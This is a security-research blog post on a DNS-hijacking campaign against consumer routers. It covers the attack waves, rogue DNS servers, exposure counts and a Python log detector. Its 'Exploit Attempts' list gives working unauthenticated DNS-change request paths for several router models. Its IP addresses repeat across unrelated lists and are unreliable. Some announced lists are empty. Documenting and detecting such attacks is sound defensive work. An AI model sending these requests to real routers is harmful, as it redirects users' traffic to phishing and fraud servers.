Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers. All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.
First wave – December 29, 2018
⚠️ WARNING ⚠️
Unauthenticated Remote DNS Change Exploit Detected
— Bad Packets Report (@bad_packets) December 30, 2018
The first DNS hijacking exploit attempts targeted multiple models of D-Link DSL modems, including:
The IP address of the rogue DNS server used in this attack was 188.8.131.52, hosted by OVH Canada.
Second wave – February 6, 2019
⚠️ WARNING ⚠️
Additional exploit attempts detected from new unique hosts. All source IPs originate from AS15169 (Google LLC) and are assigned to @googlecloud customers.
— Bad Packets Report (@bad_packets) February 7, 2019
This wave targeted the same types of D-Link modems listed above. The rogue DNS server, 184.108.40.206, was again hosted by OVH Canada.
As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).
Third wave – March 26, 2019
⚠️ WARNING ⚠️
Multiple Remote DNS Change Exploits Detected https://t.co/Ku6Wv997Yc
Target: Multiple (see attached list of routers)
Source IP: Multiple @googlecloud hosts (AS15169) 🇺🇸
Recon Scan Type: Masscan
Rogue DNS servers: 220.127.116.11 & 18.104.22.168 (AS47196) 🇷🇺 pic.twitter.com/IKXQDZBjv1
— Bad Packets Report (@bad_packets) March 30, 2019
The latest wave of attacks came from three distinct Google Cloud Platform hosts and targeted additional types of consumer routers not previously seen in this campaign, including: ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.
The rogue DNS servers used in this round, 22.214.171.124 and 126.96.36.199, are both hosted in Russia by Inoventica Services. Internet access is provided by their subsidiary Garant-Park-Internet Ltd (AS47196).
In all three waves, a recon scan was done using Masscan to check for active hosts on port 81/tcp prior to attempting the DNS hijacking exploits.
How many targeted devices are vulnerable?
Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done; however, we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge:
D-Link DSL-2640B – 14,327
D-Link DSL-2740R – 379
D-Link DSL-2780B – 0
D-Link DSL-526B – 7
ARG-W4 ADSL routers – 0
DSLink 260E routers – 7
Secutech routers – 17
TOTOLINK routers – 2,265
Why are DNS hijacking attacks conducted?
As we saw in years past with DNSChanger malware raking in $14 million, advertising-related fraud is still very lucrative for cybercriminals. Other researchers have noted domain parking remains a booming business often tied to illicit activities.
DNS hijacking is also used for phishing attacks which are largely transparent to users. In this case, the domain name of the targeted site is redirected by the rogue DNS server to a web server controlled by the threat actor. A recent DNS hijacking campaign targeting Brazilian banks was documented by Radware researchers.
Why was Google Cloud Platform used?
Being a large cloud service provider, dealing with abuse is an ongoing process for Google. However, unlike its competitors, Google makes it very easy for miscreants to abuse its platform.
Anyone with a Google account can access a “Google Cloud Shell” machine by simply visiting this URL. This service provides users with the equivalent of a Linux VPS with root privileges directly in a web browser. Due to the ephemeral nature of these virtual machines coupled with Google’s slow response time to abuse reports, it’s difficult to prevent this kind of malicious behavior.
Exploit Attempt Source IPs
188.8.131.52
184.108.40.206
220.127.116.11
18.104.22.168
22.214.171.124
126.96.36.199
188.8.131.52
Rogue DNS Servers
184.108.40.206
220.127.116.11
18.104.22.168
22.214.171.124
Exploit Attempts
/action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add
/boafrm/formbasetcpipsetup?dnsmode=dnsmanual&dns1=126.96.36.199&dns2=188.8.131.52&dns3=184.108.40.206&dnsrefresh=1
/dnscfg.cgi?dnsPrimary=220.127.116.11&dnsSecondary=18.104.22.168&dnsDynamic=0&dnsRefresh=1
/form2dns.cgi?dnsmode=1&dns1=22.214.171.124&dns2=126.96.36.199&dns3=&submit.htm?dns.htm=send&save=apply
/wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=188.8.131.52&ds2=184.108.40.206
/dnscfg.cgi?dnsPrimary=220.127.116.11&dnsSecondary=18.104.22.168&dnsDynamic=0&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=22.214.171.124&dnsSecondary=126.96.36.199&dnsDynamic=0&dnsRefresh=1
In general, we recommend that users keep their home router firmware up to date. When security vulnerabilities are discovered, they are usually patched by the manufacturer to mitigate further attacks. It’s also advisable to review your router’s DNS settings to ensure they haven’t been tampered with. Typically your DNS servers should be set to the ones provided by your ISP or to well-known public DNS resolvers.
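The DNS-change request formats listed above under Exploit Attempts, together with the advice to review your router’s DNS settings, as an added worked example that is not part of the original Bad Packets post: a small Python detector that matches access-log lines (from a honeypot or a router’s own web server) against those endpoints, pulls out the resolver addresses each request tries to set, flags the ones on the post’s rogue DNS list, and labels a configured resolver as known-rogue, known-public, LAN or needing review. The sample log lines, the source IPs in them (documentation ranges), the endpoint-to-parameter table and the short public-resolver allowlist are assumptions constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Rogue DNS servers named in the post (copied as printed on the page).
ROGUE_DNS = {
    "188.8.131.52", "184.108.40.206", "220.127.116.11",
    "18.104.22.168", "22.214.171.124", "126.96.36.199",
}

# Assumption: a short allowlist of well-known public resolvers; add your ISP's.
KNOWN_PUBLIC_DNS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "1.0.0.1", "9.9.9.9"}

# Router DNS-change endpoints from the campaign's request list, mapped to the
# query parameters that carry the resolver addresses (assumed mapping).
# "octets" marks the D-Link /action form, where dns_server_ip_1..4 each carry
# one octet of a single address.
DNS_CHANGE_ENDPOINTS = {
    "/action": "octets",
    "/boafrm/formbasetcpipsetup": ("dns1", "dns2", "dns3"),
    "/dnscfg.cgi": ("dnsPrimary", "dnsSecondary"),
    "/form2dns.cgi": ("dns1", "dns2", "dns3"),
    "/wan_dns.asp": ("ds1", "ds2"),
}

# Combined-format access log line (honeypot or router web server).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def _valid_ipv4(value):
    try:
        return isinstance(ipaddress.ip_address(value), ipaddress.IPv4Address)
    except ValueError:
        return False


def extract_dns_targets(target):
    """Return (endpoint, [resolver ips]) when the request hits a known DNS-change
    endpoint, else None. Handles the octet-split D-Link form and blank fields."""
    parts = urlsplit(target)
    endpoint = parts.path.lower()
    params = DNS_CHANGE_ENDPOINTS.get(endpoint)
    if params is None:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if params == "octets":
        octets = [qs.get(f"dns_server_ip_{i}", [""])[0] for i in range(1, 5)]
        candidates = [".".join(octets)] if all(octets) else []
    else:
        candidates = [qs.get(name, [""])[0] for name in params]
    return endpoint, [ip for ip in candidates if _valid_ipv4(ip)]


def detect(log_lines):
    """Scan access-log lines and return one alert per DNS-change attempt."""
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = extract_dns_targets(m["target"])
        if found is None:
            continue
        endpoint, dns_ips = found
        alerts.append({
            "src": m["src"],
            "time": m["ts"],
            "endpoint": endpoint,
            "dns": dns_ips,
            "known_rogue": sorted(ip for ip in dns_ips if ip in ROGUE_DNS),
        })
    return alerts


def classify_resolver(ip):
    """Label a resolver found in a router's WAN DNS settings (or resolv.conf)."""
    if ip in ROGUE_DNS:
        return "known-rogue"
    if ip in KNOWN_PUBLIC_DNS:
        return "known-public"
    if _valid_ipv4(ip) and ipaddress.ip_address(ip).is_private:
        return "lan"      # usually the router itself; check its upstream setting too
    return "review"       # on no list: confirm it is really your ISP's resolver


# Constructed sample log: request paths are the ones on the page, source IPs
# are documentation ranges (203.0.113.0/24, 198.51.100.0/24), not real hosts.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Mar/2019:04:12:01 +0000] "GET /dnscfg.cgi?dnsPrimary=220.127.116.11&dnsSecondary=18.104.22.168&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Mar/2019:04:12:02 +0000] "GET /wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=188.8.131.52&ds2=184.108.40.206 HTTP/1.1" 200 88',
    '203.0.113.9 - - [29/Dec/2018:11:03:44 +0000] "GET /action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add HTTP/1.1" 200 0',
    '198.51.100.7 - - [26/Mar/2019:04:15:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [26/Mar/2019:04:15:01 +0000] "GET /form2dns.cgi?dnsmode=1&dns1=22.214.171.124&dns2=126.96.36.199&dns3=&submit.htm?dns.htm=send&save=apply HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
    for resolver in ("192.168.1.1", "220.127.116.11", "8.8.8.8", "195.128.126.165"):
        print(resolver, classify_resolver(resolver))
```

Alerts carry the resolver addresses the request tried to set even when they are not on the rogue list, so a new campaign shows up as a “review” finding rather than going unnoticed; on a home network `resolv.conf` normally points at the router, so the addresses worth classifying are the ones in the router’s own WAN DNS page.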
Ixia researchers posted their findings on the DNS hijacking attacks originating from Google Cloud Platform. They found sites targeted for phishing included Netflix, PayPal, Uber, Gmail, and more.
We’ve been tracking the DNS hijacking attacks reported by @bad_packets yesterday. Here’s an updated list of targeted domains, along with the new IP hosting the phishing sites. Paypal, Google, Netflix are targeted, along with Brazilian banks and hosting services. HT @_mihaiv_ pic.twitter.com/C4tym5dN3H
— Stefan Tanase @ #TheSAS2019 (@stefant) April 5, 2019
They’ve also identified additional rogue DNS servers, again hosted by Inoventica Services in Russia:
A Google spokesperson provided the following statement to Ars Technica in regards to the abuse of Google Cloud Platform to conduct the DNS hijacking attacks: